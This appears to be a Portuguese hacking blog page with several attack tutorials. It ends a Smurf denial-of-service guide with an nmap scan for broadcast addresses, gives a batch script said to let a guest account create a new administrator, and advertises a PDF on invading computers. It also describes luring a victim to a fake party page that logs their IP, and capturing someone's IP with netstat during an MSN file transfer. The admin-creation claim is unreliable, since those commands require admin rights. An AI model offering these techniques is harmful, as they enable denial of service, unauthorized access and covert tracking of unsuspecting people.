Como podem ver o alvo ficou “OFF”.

Obs: Da pra usar o NMAP pra pegar endereços Ips para broadcast, usando este comando:
# nmap -sP -iR 5000 > Smurfable.txt

Tem tambem a video aula que fiz sobre este assunto, segue o link a baixo:
AQUI

Espero que tenham gostado.


Autor: Dreamexplo

Tutorial 100% Dreamexplo

0
Logar como convidado e virar administrador do PC.

Olá galera vou postar aqui algo que vai pareser meio simples... é uma forma de criar uma nova conta de administrador no computador,Usando Batch Script

Primeiro passo: Entre no computador com uma conta de convidado (ou usuário limitado)
depois abra o bloco de notas.
e cole isso la. (sem os *** é claro)
************************************
@echo off
net user 001 004 /add
net localgroup administrators 001 /add
************************************

Modifique as seguintes palavras: 001 e 004
em 001 coloque: o seu nick
e
em 004 coloque sua senha

Agora salve como .bat
e execute-o
pronto apos isso faça Logoff e troque de usuário logando com seu novo domino!

Tutorial Feito

By: ¾'s

0
Tutorial Hacking (invasão)

Aprenda com um tutorial passo a passo:

-Invadir Computadores
-Invadir por Conexão Reversa
-Capturar um IP com XSS
-Conectar em Servidores
-Redirecionar Endereços de Sites
-Procurar portas abertas de um determinado IP.
-Bombardear um IP
-Injetar um script em uma porta Sniffer
-"Pingar" por Faixa de IP
-Capturar dados de uma rede local
-Abrir uma porta de seu computador

Download:
Formato: PDF
Tamanho: 3519 KB
Paginas: 49
Linguagem: Portugues

Download

Fonte: Pr0X membro VIP do FH

0
Pegando IP em modo Avançado.

Primeira técnica:
Esta técnica é simplesmente um script em php que irá capturar o ip da pessoa e gravar num arquivo .txt… Simples e extremamente eficaz!!!!!

requisitos:
-o servidor que vai hospedar a pagina deve ter PHP e a função fopen habilitada
-se tiver usando um servidor linux tem q dar chmod 777 no arquivo “ip.txt” pra funcionar.

O Script
1º- Abra o bloco de notas e crie um arquivo em branco chamado “ip.txt” ele sera o arquivo que armazenara as informações.
2º- Faça um site qualquer .php e insira o código abaixo, faça algo como um folder online divulgando alguma festa que não exista ou algo do tipo para a pessoa não desconfiar de nada.



3º- Passe o link para a pessoa que você quer obter o endereço ip e quando ela acessar va até www.seusite.com.br/ip.txt … O IP estará registrado neste arquivo. Quando quiser obter o ip de alguém em algum local que a pessoa pode demorar um pouco para acessar (orkut, e-mail) envie apenas para ela o link, pois você poderá se confundir depois.

Segunda técnica
Esta técnica é o tão famoso e conhecido Netstat… Quem não conhece vale a pena.

Usando o Netstat para conseguir o IP via MSN

1º – Abra o seu prompt de comando e digite “netstat -n” (sem aspas, seu animal!!!). Não envie o comando!
2º – Envie um arquivo de 1Mb para a pessoa que você quer o IP.
3º – Quando a pessoa aceitar e a transferência começar, vá no seu prompt e envie o comando.

O IP da pessoa geralmente é o penúltimo da lista…

Simples, não?

O arquivo pode ser de qualquer tamanho, mas se for muito pequeno você precisará ser rápido para trocar de janelas!

Acontece o seguinte: as mensagens do MSN são enviadas a um servidor e depois ao seu colega. No caso dos arquivos, eles são enviados diretamente ao endereço da vítima, pois senão o servidor ficaria instável sempre!!!

Existe ainda o IP Get, script para MSN+, que faz esse serviço sozinho e sem enviar nenhum arquivo. Simplesmente a janelinha sobe com os dados da vítima.

( Arquivo disponível na comunidade fanta hackers )

SOBRE O NETSTAT

Exibe estatísticas de protocolo e conexões de rede TCP/IP atuais.

NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval]

-a Exibe todas as conexões e portas de escuta.

-b Exibe o executável envolvido na criação de cada conexão ou porta de escuta. Em alguns casos, executáveis conhecidos hospedam múltiplos componentes independentes, e nesses casos a seqüência de componentes envolvidos na criação da conexão ou porta de escuta é listada. Neste caso, o nome do executável está em [] na parte inferior, na parte superior está o componente por ele chamado,
e assim por diante, até chegar ao TCP/IP. Observe que esta opção pode ser vagarosa e falhará a menos que você possua permissões suficientes.

-e Exibe estatísticas Ethernet. Isso pode ser combinado à opção -s. -n Exibe endereços e números de porta em formato numérico. -o Exibe a ID do processo proprietário associado a cada conexão. -p proto Exibe conexões para o protocolo especificado por proto; proto pode ser TCP , UDP , TCPv6 ou UDPv6 Se usado com a opção -s para exibir estatísticas por protocolo, proto pode ser: IP, IPv6, ICMP , ICMPv6, TCP , TCPv6, UDP ou UDPv6. -r Exibe a tabela de roteamento. -s Exibe as estatísticas por protocolo. Por padrão, as estatísticas são exibidas para IP, IPv6, ICMP , ICMPv6, TCP , TCPv6, UDP e UDPv6; a opção -p pode ser usada para especificar um subconjunto do padrão. -v Quando usado junto com -b, irá exibir a seqüência de componentes envolvidos na criação da conexão ou porta de escuta para todos os executáveis. interval Exibe novamente as estatísticas selecionadas, fazendo uma pausa de segundos entre cada exibição. Pressione CTRL+C para interromper a reexibição de estatísticas. Caso omitido, netstat irá imprimir as informações de configuração uma vez.

Fonte: Pr0X membro VIP do FH
 
ST Informática | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog